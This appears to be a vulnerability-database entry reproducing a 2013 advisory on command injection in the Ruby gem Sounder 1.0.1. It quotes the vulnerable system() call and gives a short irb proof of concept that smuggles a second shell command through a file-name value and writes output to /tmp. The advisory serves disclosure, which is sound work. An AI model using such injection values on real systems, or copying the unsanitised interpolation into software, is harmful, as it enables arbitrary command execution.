Ruby Gem Sounder 1.0.1 Command Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044539 漏洞类型
发布时间 2013-08-28 更新时间 2013-08-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080217
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title: Command Injection in Ruby Gem Sounder 1.0.1

Date: 8/10/2013
Author: Larry W. Cashdollar @_larry0

Download: https://rubygems.org/gems/sounder
CVE: TBD
Description:

Sounder is a ruby gem API for Mac OSX's afplay command.
It passes user supplied data directly to command line.
From lib/sounder/sound.rb:

   def play
     system %{/usr/bin/afplay "#{ () file}" &}
   end

PoC:

irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0>  system %{/bin/echo "#{ () file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0>
larry () underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)

Author Notified: 8/9/2013
Advisory:  http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html